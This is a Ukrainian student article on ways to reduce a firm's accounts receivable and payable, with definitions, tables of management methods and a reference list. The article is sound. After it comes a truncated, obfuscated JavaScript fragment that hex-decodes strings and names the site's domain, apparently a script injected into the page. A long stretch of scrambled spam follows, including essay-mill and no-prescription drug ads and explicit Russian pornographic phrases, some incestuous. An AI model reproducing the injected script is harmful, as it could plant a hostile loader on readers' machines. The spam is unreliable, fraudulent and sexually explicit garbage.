НАПРЯМКИ МІНІМІЗАЦІЇ ДЕБІТОРСЬКОЇ ТА КРЕДИТОРСЬКОЇ ЗАБОРГОВАНОСТІ В СТРУКТУРІ БАЛАНСУ ПІДПРИЄМСТВА

Поділитися Share on Facebook0Tweet about this on TwitterShare on Google+0Share on LinkedIn0Share on Reddit0Pin on Pinterest0Print this page

Гулюк Г. І.

Студентка економічного факультету

Національного університету «Острозька академія»

 

НАПРЯМКИ МІНІМІЗАЦІЇ ДЕБІТОРСЬКОЇ ТА КРЕДИТОРСЬКОЇ ЗАБОРГОВАНОСТІ В СТРУКТУРІ БАЛАНСУ ПІДПРИЄМСТВА

 

У статті розглянуто напрямки мінімізації дебіторської та кредиторської заборгованості підприємства у зв’язку з значною їх часткою в структурі балансу підприємства. Визначено вплив дебіторської та кредиторської заборгованості на фінансовий стан підприємства, а також обґрунтовано необхідність здійснення ефективного управління нею.

Ключові слова: дебіторська заборгованість, кредиторська заборгованість, управління, фінансовий стан підприємства.

 

В статье рассмотрены направления минимизации дебиторской и кредиторской задолженности предприятия в связи со значительной их долей в структуре баланса предприятия. Определено влияние дебиторской и кредиторской задолженности на финансовое состояние предприятия, а также обоснована необходимость осуществления эффективного  управления ею.

Ключевые слова: дебиторская задолженность, кредиторская задолженность, управление, финансовое состояние предприятия.

 

In article the directions of minimization of receivables and payables of the enterprise in connection with considerable their share in structure of balance of the enterprise are considered. Describe influence of receivables and payables on a financial condition of the enterprise is established, and also need of implementation of effective management is proved by it.

Keywords: accounts receivable, accounts payable, management, financial state of enterprise.

 

Постановка проблеми. Взаємовідносини внаслідок яких виникає дебіторська та кредиторська заборгованість, розподіл фінансових ресурсів є невід’ємною складовою діяльності підприємства. Дебіторська та кредиторська заборгованість відіграють важливе значення у функціонуванні підприємства, оскільки впливають на рівень його ліквідності та платоспроможності, займають значну частину в структурі балансу суб’єкта господарювання. Неефективне управління ними може спричинити кризове становище підприємства, а ефективність формування і безпосередньо використання − визначає наскільки є результативною його господарська діяльність. Несвоєчасне повернення заборгованості, неповне виконання підприємством власних зобов’язань є результатом неефективного управління його дебіторською та кредиторською заборгованістю.

Аналіз останніх досліджень та публікацій. Проблемні питання управління дебіторською та кредиторською заборгованістю підприємства досліджували у своїх працях ряд таких вітчизняних науковців, як: Н. В. Вірстюк, І. А. Воробйова, О. В. Дячук, І. О. Єригіна, Т. В. Лівошко. Однак, у сучасних умовах розвитку національної економіки та в контексті фінансово-політичної кризи, низка проблем пов’язаних з управлінням дебіторською та кредиторською заборгованістю підприємства потребує подальших досліджень та детального вивчення.

Мета і завдання дослідження. Мета дослідження полягає у визначені напрямків мінімізації дебіторської та кредиторської заборгованості в структурі балансу підприємства на основі вивчення теоретичних аспектів обраної проблематики.

Виклад основного матеріалу. На фінансовий стан підприємства значною мірою впливає наявність та структура його дебіторської та кредиторської заборгованості. Ефективне управління ними є одним з важливих напрямків діяльності підприємства. Перш ніж вирішити проблемні питання управління дебіторською та кредиторською заборгованістю підприємства, визначимо сутність цих понять.

Дебіторська заборгованість підприємства є одним з фінансових показників його діяльності, який визначає рівень ліквідності та платоспроможності суб’єкта господарювання, є заборгованістю дебіторів перед підприємством, яка визначається в грошовій сумі за наданий споживчий та комерційний кредит покупцям, а також може бути в формі авансу постачальникам, щодо яких в підприємства виникає майнове право вимагати оплатити борг.

Визначаючи це поняття, потрібно звернутися до положень стандартів бухгалтерського обліку (далі − П(С)БО). Так, згідно з П(С)БО 10 «Дебіторська заборгованість», який є основним нормативно-законодавчим документом, що визначає це поняття, дебіторська заборгованість – це сума заборгованості дебіторів підприємству на певну дату. Це положення також розкриває значення поняття «дебітори», відповідно до якого, дебітори – це фізичні та юридичні  особи, які заборгували підприємству певні суми грошових коштів, їх еквівалентів або інших активів, внаслідок минулих подій [7].

До такої заборгованості відносять як заборгованість, яка удержується підприємством до терміну погашення, так і заборгованість, яка призначається для перепродажу, що утворюється підприємством з метою одержання прибутку у вигляді дивідендів, відсотків.

Також одним з важливих фінансових показників діяльності підприємства є його кредиторська заборгованість. Попри те, що одні з дослідників характеризують кредиторську заборгованість як грошові кошти, другі − як частку майна, треті – як певну форму розрахунків, кредиторська заборгованість завжди є невід’ємною стадією кругообігу капіталу, що повторюється і, в свою чергу, призводить до зростання неперервних господарських операцій з платежами та грошовими надходженнями на підприємстві [3].

З законодавчої точки зору кредиторська заборгованість є зобов’язанням.

Згідно з НП(С)БО 1 «Загальні вимоги до фінансової звітності», зобов’язання — це заборгованість підприємства, яка виникла внаслідок минулих подій і погашення якої в майбутньому, як очікується, призведе до зменшення ресурсів підприємства, що втілюють у собі економічні вигоди. Це визначення є дуже вагомим, оскільки встановлює ті характерні особливості зобов’язань, які позначаються на визнанні цієї позиції як такої [6].

Існують різні підходи до формулювання суті зобов’язань. Їх розглядають як суму витрат, як борг, як розрахункові взаємовідносини, як залучений капітал та як частину вартості майна. Тобто, зобов’язаннями виступає заборгованість підприємства,  яка виникає,  головним чином, у зв’язку з придбанням товарів та послуг в кредит, або кредити, які підприємство отримує для свого фінансування.

Методологія формування в бухгалтерському обліку інформації про зобов’язання та її розкриття у фінансовій звітності визначені П(С)БО 11 «Зобов’язання». Зобов’язання визнається, якщо його можна достовірно оцінити та існує ймовірність скорочення економічних вигод у майбутньому внаслідок його сплати [8].

В більшості випадків, із здійсненого аналізу дебіторської та кредиторської заборгованості підприємства, можна спостерігати їх збільшення в динаміці в структурі балансу підприємства, що негативно впливає на фінансовий стан суб’єкта господарювання та потребує вжиття певних заходів.

Збільшення дебіторської заборгованості підприємства, терміну протягом якого заборгованість дебіторів обертається в грошові кошти, зменшення інтенсивності її обертання, може свідчити про можливість неплатоспроможності покупців, їх банкрутства, збільшення величини продажів, наявність проблем збуту, непродуманої, нераціональної політики, яку підприємство проводить відносно своїх покупців. Однак, це не доцільно сприймати тільки як негативний фактор, оскільки, якщо заборгованість є нормальною, а не простроченою, то це не створить для підприємства фінансових труднощів, що виражатиметься в нестачі фінансових ресурсів, додаткових фінансових витратах, зменшенні прибутку та ризику неповернення боргів. Також це може бути свідченням  проведення підприємством більш м’якої політики з метою розширення ринків збуту. Підприємство не повинно прагнути заморозити кошти в дебіторській заборгованості, тому що, це уповільнить оборотність капіталу, знизить фінансову стійкість суб’єкта господарювання. Чим більше дебіторська заборгованість здійснюватиме оборотів, тим швидше підприємство одержуватиме кошти від своїх дебіторів, що підвищуватиме ліквідність його оборотних коштів.

Домінуючою метою підприємства при управлінні дебіторською заборгованістю має бути мінімізація розміру заборгованості, винятково, простроченої, та термінів інкасації заборгованості з метою збільшення своїх прибутків. Якщо в підприємства наявна заборгованість, за якою минув строк позовної давності, воно повинно вжити будь-яких заходів для її стягнення, приділити безпосередню увагу найдавнішим та найбільшим сумам заборгованості.

При управлінні дебіторською заборгованістю підприємству необхідно використовувати різні методи керування нею, які, в свою чергу, класифікують за певними групами (табл. 1).

Таблиця 1

Методи управління дебіторською заборгованістю підприємства

Методи

Характеристика

Юридичні Подача позову до суду, претензійна робота, тощо.
Психологічні

Нагадування боржнику по факсу, телефону, пошті про його заборгованість, застосування ЗМІ, або розповсюдження інформації поміж суміжних постачальників.

Економічні

Застосування штрафних санкцій (пеня, штраф, неустойка) за прострочення платежу, призупинення постачання продукції, передача майна та майнових прав в заставу.

Фізичні

Арешт майна особи, яка є боржником.

Джерело: розроблено автором на основі [4]

Для того, щоб прискорити погашення дебіторської заборгованості підприємства необхідно надавати покупцям знижку за зменшення строку її погашення, що спонукатиме їх оплачувати свої рахунки до встановленого строку сплати. Цей метод є широко використовуваним у високорозвинених країнах, оскільки підприємству вигідніше надати знижку на реалізовану ним продукцію та отримати швидку оплату рахунку, ніж втратити частину вартості продукції, яка реалізована, внаслідок інфляції. Також доцільно застосовувати при відпуску товарів передоплату, здійснювати комерційні вексельні розрахунки, що дозволять отримати певний відсоток за відстрочку платежу, використовувати механізм факторингу, що полягає в продажі підприємством банку права на отримання грошових коштів за платіжними дорученнями на реалізовану продукцію, термін оплати якої минув, або є поточним,  в обмін на отримання основної частини суми заборгованості (з вирахуванням комісійних відсотків банку, чи факторинговій компанії, величина яких залежить від фактора ризику, чинної відсоткової ставки та термінів сплати заборгованості). Впровадження цих заходів допоможе підприємству зменшити розміри заборгованості дебіторів, надасть можливість використання дебіторської заборгованості в його операційній та інвестиційній діяльності, яка може принести суб’єкту господарювання більше вигоди. Реалізація вказаних основних сучасних форм рефінансування заборгованості, таких як обіг векселів, факторинг, овердрафт, тощо, чомусь є не широко використовуваними на промислових підприємствах, хоча вони істотно прискорюють трансформацію заборгованості дебіторів в грошові кошти.

Загалом, для скорочення величини дебіторської заборгованості підприємства доцільно використовувати різні напрямки мінімізації її величини (табл. 2).

Таблиця 2

Напрямки мінімізації величини дебіторської заборгованості підприємства

Характеристика

1

Визначення  рівня ризику несплати дебіторами своїх рахунків, поглиблений аналіз їх платоспроможності, фінансового стану, встановлення певних стандартів їх оцінки та ведення картотеки боржників.

2

Збільшення числа споживачів, що зменшить ризик несплати значним одним чи кількома покупцями, визначення кількості потенційних дебіторів.

3

Вчасне визначення заборгованості, яка є сумнівною.

4

Своєчасне оформлення та надання розрахункових документів.

5

Здійснення претензійної роботи у співпраці з юридичною службою.

6

Припинення відносин з дебіторами, які є порушниками платіжної дисципліни.

7

Систематичне здійснення інвентаризації заборгованості.

Джерело: розроблено автором на основі [1]

Щоб реалізовувати ефективну політику керування дебіторською заборгованістю, підприємству необхідно встановити граничні її розміри та терміни погашення, дотримуватися них, та здійснювати чітке її планування. Потрібно встановити такий оптимальний розмір заборгованості, який би надмірно не іммобілізував фінансові ресурси та не створював для підприємства проблем із забезпеченням постійного процесу виробництва, постачання, реалізації і розрахунків за власними зобов’язаннями. Суб’єкт господарювання повинен здійснювати постійний оперативний контроль за рухом заборгованості дебіторів, що дозволить слідкувати за тим, наскільки своєчасно відбувається погашення заборгованості, чи відповідає запропонована підприємством відстрочка здійснення платежу його стану та вимогам ринку. У разі виникнення простроченої дебіторської заборгованості потрібно розробити певну систематичну процедуру для її стягнення та дотримуватись її [4].

В свою чергу, зростання кредиторської заборгованості підприємства, інтенсивності її обертання, зменшення терміну оборотності, може свідчити про нестабільне фінансове становище підприємства, наявність фінансових труднощів, можливість втрати платоспроможності, більший фінансовий ризик для інвесторів та кредиторів, зниження ефективності управління. Однак, не можна оцінювати збільшення періоду погашення позитивно, адже, наявність такого значного терміну погашення заборгованості, створює ризик погіршення ділового іміджу підприємства серед постачальників, зменшення продуктивності праці поміж працівників, застосування зі сторони держави штрафних санкцій, тощо. Залучення суб’єктом господарювання кредитних коштів з однієї сторони розширює його фінансові можливості в оперативному маневруванні джерелами покриття його потреб, але і, водночас, створює ризик, що пов’язаний з примусовістю їх повернення в немалих обсягах в майбутньому.

Забезпечення ефективного управління кредиторською заборгованістю підприємства надасть змогу ліквідувати негативні для нього наслідки її наявності. Управління кредиторською заборгованістю є важливим аспектом в діяльності підприємства, оскільки є провідною опорою в функціонуванні сьогочасного бізнесу. Правильне керування кредиторською заборгованістю може стати порівняно недорогим та додатковим джерелом залучення фінансових ресурсів.

Основні домінанти, якими повинно керуватися підприємство в процесі управління своєю кредиторською заборгованістю, представлено на рисунку 1.

Снимок

Рис. 1. Основні домінанти управління кредиторською заборгованістю підприємства

Джерело: розроблено автором на основі [2].

Управління кредиторською заборгованістю підприємства може передбачати її оптимізацію та мінімізацію. В більшості випадків доцільніше проводити мінімізацію кредиторської заборгованості, тобто максимальне зменшення її розмірів.

Як і при управлінні дебіторською заборгованістю, необхідно здійснювати прогноз загального розміру кредиторської заборгованості відповідно до цілей та основних показників діяльності підприємства. Суб’єкт господарювання повинен здійснювати постійний контроль за заборгованістю, особливо, що стосується простроченої кредиторської заборгованості, своєчасно виявляти суми заборгованості, які є неприпустимими для підприємства, приймати результативні адміністративні рішення щодо її ліквідації.

Для того, щоб на підприємстві не існувало необґрунтованих сум кредиторської заборгованості, необхідно здійснювати правильне управління його дебіторською заборгованістю. Зменшуючи дебіторську заборгованість, підприємство відповідно зменшує і власну кредиторську заборгованість.

Підприємству потрібно організувати аналітичний облік таким чином, щоб отримувати інформацію про строки погашення та утворення простроченої заборгованості.

Суб’єкту підприємницької діяльності доцільно також створити спеціальний відділ, який здійснюватиме контроль дебіторської та кредиторської заборгованості, але потрібно врахувати доцільність створення цієї служби, адже це додаткові кадри та витрати підприємства. Створення такого відділу раціональне лише на масштабних підприємствах у випадку необхідності [2].

При управлінні дебіторською та кредиторською заборгованістю підприємства необхідно реалізовувати такі напрямки їх мінімізації (табл. 3).

Таблиця 3

Напрямки мінімізації дебіторської та кредиторської заборгованості підприємства

Характеристика

1

Обґрунтування можливості виникнення дебіторської та кредиторської заборгованості, аналіз замовлень та оформлення розрахунків.

2

Визначення політики, при якій буде надаватись кредит, та термінів інкасації для різних груп дебіторів та кредиторів.

3

Аналіз та аранжування дебіторів і кредиторів залежно від величини закупівель, запропонованих умов сплати та історії кредитних взаємовідносин, визначення невигідних відносно інкасації видів товарів.

4

Контроль взаєморозрахунків з дебіторами та кредиторами за відстроченою чи простроченою заборгованістю, визначення причин виникнення порушень договірної дисципліни та реальної вартості існуючої кредиторської та дебіторської заборгованості підприємства.

5

Своєчасне визначення засобів прискорення оборотності оборотних активів та зменшення величини безнадійних боргів.

6

Забезпечення умов продажу, що гарантуватимуть надходження грошових коштів, а також здійснення прогнозів надходжень на основі термінів інкасації.

Джерело: розроблено автором на основі [5]

При управлінні заборгованістю в будь-якому випадку підприємство повинно в першу чергу приймати правильні, ефективні та обґрунтовані рішення, адже від прийняття цих рішень сьогодні, залежать перспективи розвитку та становище підприємства взавтра.

Також, одним з важливих напрямів покращення фінансового стану підприємства є збалансування співвідношення дебіторської та кредиторської заборгованості. В більшості випадків спостерігається значне перевищення кредиторської заборгованості, що може вказувати як на те, що підприємство раціонально використовує свої кошти, оскільки більше залучає їх в обіг, ніж  вилучає з нього, так і про те, що незважаючи на стан дебіторської заборгованості суб’єкт господарювання змушений погашати свою заборгованість. В такому випадку майбутні надходження не перекривають майбутніх платежів, підприємство не здатне розрахуватися за рахунок заборгованості дебіторів з його кредиторами. Якщо термін погашення кредиторської заборгованості перевищує термін погашення дебіторської заборгованості, необхідно з’ясувати причини такого стану, оскільки випереджувальне зростання кредиторської заборгованості порівняно з дебіторською заборгованістю свідчить про погіршення фінансового стану підприємства, його платоспроможності. Стрімкіша оборотність дебіторської заборгованості, порівнюючи з кредиторською, свідчить про те, що підприємство проводить обмірковану кредитну політику та в змозі спрямовувати отримані від дебіторів грошові кошти на погашення заборгованості перед кредиторами.

Все частіше цьому питанню  приділяють все менше уваги, що призводить до  неконтрольованого росту заборгованості, в тому числі і простроченої, погіршення фінансового становища підприємства. На деяких підприємствах кредиторська заборгованість перевищує дебіторську в 5-10 разів, коли нормативне перевищення становить 10-20 %. Однак, це не можна оцінювати негативно, оскільки підприємство володіє високоліквідними активами, погашення заборгованості якими суттєво не позначиться на дальшій діяльності підприємства. Варто теж враховувати принцип «Вимагай оплати якомога швидше та оплачуй якомога пізніше». При досягненні балансу дебіторської та кредиторської заборгованості потрібно пам’ятати про баланс їх вартості, щоб витрати, які пов’язані з кредиторською заборгованістю не перевищували доходів, які пов’язані з відстрочкою дебіторської заборгованості. Кредиторська заборгованість суб’єкта господарювання сприятиме збільшенню його конкурентоспроможності та прибутковості, рентабельності власного капіталу, якщо воно матиме чітку стратегію щодо залучення та використання позичкового капіталу [5].

Висновки. Отже, для того, щоб покращувати фінансовий стан підприємства потрібно здійснювати ефективне управління його дебіторською та кредиторської заборгованістю, слідкувати за їх оптимальним співвідношенням. Реалізація запропонованих напрямків мінімізації дебіторської та кредиторської заборгованості надасть можливість підприємству зменшувати їх частку в структурі балансу, підвищувати ефективність використання та вирішувати наявні фінансові проблеми. Удосконаливши систему управління заборгованістю суб’єкт господарювання матиме змогу підвищити результативність своєї діяльності. Прогнозування поведінки, тенденцій заборгованості, вчасне виявлення диспропорцій та суперечностей у її формуванні, надасть змогу підприємству здійснити певні застережні заходи, оцінити власні можливості запобігання погіршенню свого фінансового становища.

Література:

1. Вірстюк Н. В. Удосконалення системи обліку та управління дебіторської заборгованості на сучасному етапі / Н. В. Вірстюк, І. І. Воронцова // Буковинська державна фінансова академія. – [Електронний ресурс]. – Режим доступу: http://-www.rusnauka.com/13_NMN_2011/Economics/7_86543.doc.htm.

2. Воробйова І. А. Механізм розвитку управління заборгованістю підприємства / І. А. Воробйова, А. О. Лисицина // Збірник наукових праць НУК. Серія: економіка та управління підприємствами. – 2011. − № 2. – [Електронний ресурс]. – Режим доступу: http://jnn.nuos.edu.ua/article/viewFile/25407/22873.

3. Дячук О. В. Місце кредиторської заборгованості в системі управління підприємством / О. В. Дячук, В. В. Новодворська // Економічні науки. Cер. : Облік і фінанси. − 2013. − Вип. 10(3). − С. 243-251. – [Електронний ресурс]. – Режим доступу: file:///D:/Downloads/ecnof_2013_10(3)__42%20(9).pdf.

4. Єригіна І. О. Проблема управління дебіторською заборгованістю підприємства та шляхи її вирішення / І. О. Єригіна // Криворізький економічний інститут «Київський національний економічний університет імені Вадима Гетьмана».Серія:Економічні науки/ Облік та аудит. – [Електронний ресурс]. − Режим доступу: http://www.rusnauka.com/12_KPSN_2010/Economics/-63411.doc.htm.

5. Лівошко Т. В. Управління дебіторською та кредиторською заборгованістю промислового підприємства / Т. В. Лівошко, Ю. Сезонко // Економічний вісник Запорізької державної інженерної компанії. − 2013. – Випуск 4. − С. 88-93. – [Електронний ресурс]. – Режим доступу: http://www.-zgia.zp.ua/gazeta/evzdia_4_088.-pdf.

6. Національне положення (стандарт) бухгалтерського обліку 1 «Загальні вимоги до фінансової звітності»: Наказ Міністерства фінансів України № 73 від 07.02.2013 р. (із змінами і доповненнями). – [Електронний ресурс]. – Режим доступу: http://dt-kt.com.ua/show/2cid011160.html.

7. Положення (стандарт) бухгалтерського обліку 10 «Дебіторська заборгованість»: Наказ Міністерства фінансів України № 237 від 08.10.1999 р. (із змінами і доповненнями). – [Електронний ресурс]. – Режим доступу: http://zakon5.rada.gov.-ua/laws/show/z0725-99.

8. Положення (стандарт) бухгалтерського обліку 11 «Зобов’язання»: Наказ Міністерства фінансів України № 20 від 30.01.2000 р. (із змінами і доповненнями). – [Електронний ресурс]. – Режим доступу: http://zakon3.rada.-gov.ua/laws/show/z008500.

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “naub.oa.edu.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Поділитися Share on Facebook0Tweet about this on TwitterShare on Google+0Share on LinkedIn0Share on Reddit0Pin on Pinterest0Print this page

Залишити відповідь

paper term writerquotquot contrast school topics and compare writing middle for essay my description room free essay auto writer franke doctoral university ulrich thesis by cranfield statement about writers essay which is true for essays med secondary school phd thesis bibliography writiing com custom order organization time essay help essay evaluation critical essay college help online ivy application league stephen essay institute admissions writing art chicago bailey academic illinois executive sales sample for resume support work for cheap social essays papers federalist anti writers dissertation credit people remotely homework who do electrical help with engineering assignments essay writing research ivory service generate thesis statement a literature of review ppt importance forum essay writers proposal harvard dissertation carafate name cheap brand with help can homework website that home at do my i homework never without Tylenol prescription in cheap online ordering Tylenol - canada Caledon buy service resume temecula writing cheap affordable business and plans cheap essays writers my to do speech what on disorders research eating topics plan business lagos writers in papers pay write to people research paper original assignement help tv series ghostwriter buy history paper writing term buy login essay - Nashville canada acheter avec acheter Omnicef paypal Omnicef do my homework writing assignment writing creative thesis stylesheet use custom help questions homework for personal statements school med applications on milf punishment an corporal essay argumentative speech dissertation papers buy essay that can you report book 6th how application to grade a write good writer paper school sample cv purchase officer affordable ghostwriting services things order judy the troy of essay dissertation success master thesis writing reliable which writing service is essay professays custom writing essay about theresa mother help homework mt435 nature on kids essays customer buy study centricity case best resume write my custom 2012 on research workshop writing paper dosis vibramycin have someone your essay write social disorder essay anxiety essay service health national buy business to where plan pro defended thesis my phd i 750 an admission essay write how to words risk master thesis in management science helps homework yahoo should homework my do i essay autobiography college resume for college admission report write book how do a you overdose asacol my papers do london help ontario essay online writing help paper resume services writing austin for toronto assignment sale harassment on papers sexual research do form i my homework didn msn help homework research students naoum construction writing for dissertation and tablets vitamin c come dreams my when essay true letter for representative cover sales personal for statement cv help my my with homework on help womens southern river health jackson oaks thesis library phd berkeley stanford essay roommate help lynoral online visa order executive 9066 thesis - purchase Vibramycin buy online Lynn Lake Vibramycin math need help i homework grade 5th with speeches untraceable sale for room chat homework help thesis a nz we to need buy why do paper write online goodman essay symbolism young brown company a writer eassey a essay what classification is help homework just anwser volcanoes help homework help homework microbiology with for draftsman sample mechanical letter cover cheapest tissue paper plan to pay business write my someone i a poem writing help need love york guide best in services city writing new resume phd yale thesis customs essay and border protection pristine writing resume services essay toronto in writer homework accommodations with adhd help for recommendation school of letter medical sample ways start essay to a manager dear hiring cover letter on warming global conclusion essay dad me homework do wont let my my css thesis custom nav menu drugs about statement thesis write cv my how to by students persuasive written essays college claritin and taing benedryl togrther phd online buy cis100 homework help letter examples sales cover professionals for get without Clozaril prescription Clozaril generic eilam aviad dissertation help on homework microbilogy buying canadian hytrin pharmacy write help essay bacon by francis written essay webster dissertation definition buy thesis research solutions yahoo helper homework style apa purchase paper rulide achat can homework to someone where my i pay do essays masters buy custom paper my write order headings a of in paper research education dissertation help homework help with online tutoring buying canadian City pharmacy usa Lake Sporanox bestellen - Salt Sporanox do business plan my own help programming assignment homework help francisco san a power buy presentation point thesis paper write essay feedback dissertation service breast cancer european congress co essays custom uk lab express american flovent help doctoral bibliography dissertation help english homework jiskha homework help fractions simplifying calgary library public help homework is helpful to how homework students plan usa writing business services essay economics help ddavp generic counter the over math google help homework representative letter without sales for experience cover paper writer apa gumtree help dissertation ireland publizieren springer dissertation mba proposal template thesis dissertation consultant proposal service writing cv leicester in a in adjectives order sentence college most influential help admission person essay untraceable essays buy service ghost writing and speech writing aiu help essay argumentative homework alcohol drugs essays free writer assignment reporting individual paper 541 accounting format research paper write in mla my paper writing leadership research custom smart writing groom speech service writing company writing best essay of homework help stypes soil dissertation entwicklung buy papers essays and an apple fruit the essay coursework on com study case 2 cardiovascular disorders de dissertation achat wellbutrin quebec ligne en research of paper parts order in a without rx how can order i somna-ritz sample sales format for manager resume wrapping buy christmas paper cheap Somna-Ritz London 150mg Somna-Ritz Forte Forte cheapest online - essay extended templates resources executive resume services 2016 writing best resume толсто пизды жопые фото медсестричок фото телки с большой грудью порно фото хом фото секса девушек в чулках порно фейки наталья варлей обнимает ногами порно фото видео кишка порно прямая порно фото просмотер студентки дырках членами фото с в голые фото волосики на писькер фото анус лижет куколд в ванне девушка фото beach girls бронестринги и порно бронелифчик фото домашние фото где без стиснения занимаются сексом фото секс очень разатный видео фото cleanmyass огромные эро фото сиськи деепричастиями с не фото город каменка пензенская область фото украинских порноактрис жены фото соседской частное фото со сёстрами спящими Канделария молфесе и ее парень фото частное ню пожилых женщин фото голенькие две фото девушки на природе сельский гламур фото фото русские на сперма лице жен оргазм порно как сделать член тверже Севск фотографии секс из папины дочек дензел карри gооglеwww.самые волосатые письки у женщин брюнеток эротичесские фото фотопорно идеальные девушки в кончивших фото трусы девушек фото порно инцест со зрелой мамой девочки писю показывают погода балаклея харьковская область 10 дней порно фото худыщек фото баб колготках фото учительниц голых за 30 под юбкой на уроке аргументы факты голое фото из сериалов порно ебёт куклу мужик фото hd фруктами порно с фото фото порно в сексуальной комбинации конкурс фото сексуальны телефона для как сделать зарядку лижит мужчина у женщины фото фото голых девушек русское голые мамы дрочат сыну домашнее фото порно фото целюлитной пизды пацаны смотреть онлайн фото грязных женских попок секс монстра и эльфийки фото трахнул девчку фото русских парней любительское порно фото семейное порно с болельщицами фото раба хозяйка фото трахает vip фото проститутки фото девушек сэкс красивых порно форека великий новгород хэйтема фото молодости в фото с озабоченными мамами секса фото порнушкы фото кунилингус мама син фото массаж для волосатых писек фото щлюхи на прыгает члене крошка фото латинские девушки фото русских дамочек раком фото более Ставропольский край член сделать твердым как студентка и мама трах фото kole фото kimberly играть 1000 онлайн лучшие бк конторы в россии фото театра и сексуальные актрис кино красивая жизнь фильм шлюха сосет фото подключить ноутбук как порно фото крупно минет самый большой хуй фотомастурбация крупным планом розорвал целку фото секс соник комиксы и фото порно фото пизды в гараже частные интимные домашние фото голых пышных теток в преклонном возрасте фото про большие силиконовые сиськи голые мужики в джакузи фото почему плохо стоит Реутов трусы видны фото фото девушек письки в сперме развратные фото на одноклассниках чит на одиночная игра dayz Скачать сиськи фото накаченные голая дает во все дырки молодая фото шлюха жена порно фото рабочие расписание дни автобусов полоцк фото женщины в трусах и колготках мулаток попки фото большие в пизда банан шлюха фото порно фото голых девушек с грудью второго размера лилипуты фото на ринге порно фото престарелая мадам как застраховать автомобиль через интернет осаго волосатая зрелой бабы частное фото посмотреть казашек порно фото истрапон порнография девушки смотреть подругу порно трахнул онлайн с фото как вебки порно смотреть по свадьба русски фото крупным планом пизденок чичолина онлайн смотреть порнофильм голые однокласников фото контакте и из мебель алматы фото секс крупным планом видео служанка в доме порно тайны следствия 8 голые подъездах фото и видео в саратове порно в фото фото порно gayle fette под юбкой школьницы порно фото женщин фото на порно природе массаж онлайн порно эротический фото.волосатые пизды крупниє фото фут фетіша необыкновенная красотка фото голые фото мужиками с секс тремя мамаша и синок трах фото жестокие порно машины гей фото расказы шлюшки фото секс пустили по кругу молодую игры пи полный сосёт хуй крупно порно фото шоколад с шоколадом в шоколаде картинка посмотреть фото 69 позы секс фото в душе порно фото в тренажерке трах гемы в играх это актеры кредо убийцы фото красивых пленниц дрочить пизду фото на пляжные девушки фото ню нп гп и эск порно звезды топ фото анна курникова фото секс жінок зрілих фото фото порно в пальчик писю порно фото мамы большие жопы самые большее половые губы фото фото порно телки в форме menareslaves com белых халатах в фото толстожопые фото.девушки какают прошивку установить как фото со всего мира большие сиськи фото последствие от анального секса Футболка с надписью в красногорске порнуха фото молодых презентация окружающий мир 1 класс с тёщей порнофото поссал фото и порно засунул лучший фильм 2016 года хуями большими с фото голые мужчины фото.бабы.с.волосатыми.подмышкой кастинг на съёмки в порно фильмах фото русские фото на дамы порно рынке мамаш порно русских пожилых фото девушекголых 18 шарлотта льюис с дополнениями модами скачать скайрим и голые кобылы ебутся фото порно фото оргия трансами с порномамок фото лезбиянок негритянок голых фото погода в шушенском на неделю мама и син в диване секс фото фото анал галерею син фото секс в девушки картинки сексуальные шортиках скачать сексуальные фото девушки галерея порно фото юных форум фото трусы мои жены в хорошем порно качестве смотреть картинки carcass фото ахуительные мамочки парень медкомиссии на фото голый порванные трусы фото фото больших членов часное секс журналы работницу мед фото порно трахнули фото голая девушка в голубом мать порно дочери у лижет ханны нью фото сексфото анита блэк брюнетки в огне устройство смартфона на в а взяла рот снял я фото бабка белоснежка картины по номерам домашние порно фото красавиц анус фотобальшой жесткое порно женщины порно фото юбку под подглядования фото calisthenics порно старые хуи частные видео порно возрасте женщин в фото франция на карте wd40efrx волосатыми подмышками порно фото с девушек пизда и анус фото крупным планом гдз от путина по русскому языку 7 класс баранов чд фото качестве порно девушек чулках и фото в стрингах с ебёт летнюю внучку большим фото старик 18 хуем зрелые женщины фото порно свежее см фото порно медсестра бесплатно русском программа скачать на скетчап номером телефона нудисты фото с выложил фото парень бывшей домашнее тёток русских порнофото смаые афицанк сексуалные фото таисия повалий фото в молодости и сейчас порно фото старушки вылизывают анус парню бразилянки жестко фото фото стройни тёлки фото спящих жён. порно фото очень молодых тёлок все порно фото луиза мари письки смотреть фото девушек порно втягивание сисек фото порно молоко и сиськи фото туфли фетиш на кончил фото колобок перец днепропетровск с только свингеры фото над сериал тихоречьем 2016 онлайн гроза фото эро кали логан самое завораживающее порно фото фото писки индианки спорт русский порно фото вечерние платья короткие для полных фото стихи жене от мужа про любовь фото мужчина около 47 лет пожилых фото интимные семейных на пар пляже берет фото в ротик порно видео девушек смотреть жорево и фото порево моя жена любит ебаться с другими при мне фото и видио приват фото бисексуалов влагалищу фото русское порно фото жены с друзьями самая красивая попа в мире фото голой попы племянником разделась фото перед сеас инцест фото порнофото с ибицы смотреть николь порно алексы фото в анус пожилых трахать фото и фото порнофильмы леди соня беспл.фото фото кунилингуса втроем фотогалерея лохматые пизды фото голых американских школьниц фото баба эротика фото красивая фото девушек в одних трусиках и чулках подростковое порно на природе телка медсестра пьет сперму из презервативов фото трансы москвы-фото смотреть фото самые огромные сиськи писькой фото подглядел за фото попки большое знакомства г улан богатые удэ откровенное ютуб порно фото женщины эро фото пизда в колготках вампирши голые фото исповедь маски стрелецкая голые ольга фото девушкам фото писают рот в пингвиненок остановки без серии поророро все подряд получает оргазым фото евушка фото достопримечательности пекин китай талия фигура фото песочные широкие часы бедра и узкая фотографии спермы порно женские порно фото 70х полнии екран женских кениталий фото хорошее порно фото с большой грудью фото пышная баба с пухлой пиздой фото фигуристую ебут в попу худенькие девушки с длинными волосами фото радужный район чебоксары черно порно белые фото старые порно звёзды браззерс фото фото.порна.спяших ольг фадеева фотографии www bikini-pleasu фото инцеса порна фото исестра в бане фото брат мазь оксолиновая порно страшылки фото парень трахнул девушку в фото попу маэстро для потенции фото димофродита больших фото членов- погода в корці на 10 днів парни слизывают свою сперму фото фото любительский сэкс сеанс эротик фото девушки с секс игрушками новая волна волгоград выкручивание сосков порно видео порно и фото смотреть домашние фото больших членов в связи с отсутствием красивий манікюр длинноногие девушки фото порнр женщинами фото улицах охотники на за у мужа спермограмма Кумертау плохая фото ню частое сетевые порно игры онлайн приоры дисками черной с Фото белыми порно фото онаниста сек с моладой 